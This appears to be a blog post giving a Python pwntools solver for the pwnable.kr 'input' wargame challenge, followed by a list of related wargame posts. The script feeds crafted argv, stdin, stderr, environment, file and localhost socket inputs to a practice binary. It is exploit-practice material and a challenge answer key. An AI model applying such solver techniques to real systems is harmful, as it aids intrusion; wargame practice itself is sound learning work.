exploit code

# -*- coding: utf-8 -*-
from pwn import *

global port
port = "8080"

def stage1():
	arg = ['/home/input2/input'] 

	for i in range(99):
		arg.append(str(i))	
	arg[65] = "\x00"
	arg[66] = "\x20\x0a\x0d"
	arg[67] = port #stage5
	return arg

def stage2():
	f = open("stderr", "w")
	f.write("\x00\x0a\x02\xff")
	f.close()
	err = open("stderr", "r")
	return err

def stage3():
	env = {'\xde\xad\xbe\xef': '\xca\xfe\xba\xbe'}
	return env

def stage4():
	fp = open("\x0a", "w")
	fp.write("\x00\x00\x00\x00")
	fp.close()
	
def stage5():
	r = remote("localhost", int(port))
	r.sendline("\xde\xad\xbe\xef")
	r.close()

def main():
	p = process(stage1(), env=stage3(), stderr=stage2())
	print p.recv(1024)
	p.sendline("\x00\x0a\x00\xff") # stage2
	print p.recvline('')
	stage4()
	print p.recv(1024)
	stage5()
	p.interactive()
	p.close()

if __name__ == "__main__":
	main()


'Wargame > pwnable.kr' 카테고리의 다른 글

pwnable.kr cmd2  (0) 2018.06.15
pwnable.kr cmd1  (0) 2018.06.15
pwnable.kr coin1  (0) 2018.02.19
[pwnable.kr] shellshock 1p  (0) 2016.08.20
[pwnable.kr] mistake 1p  (0) 2016.08.19

+ Recent posts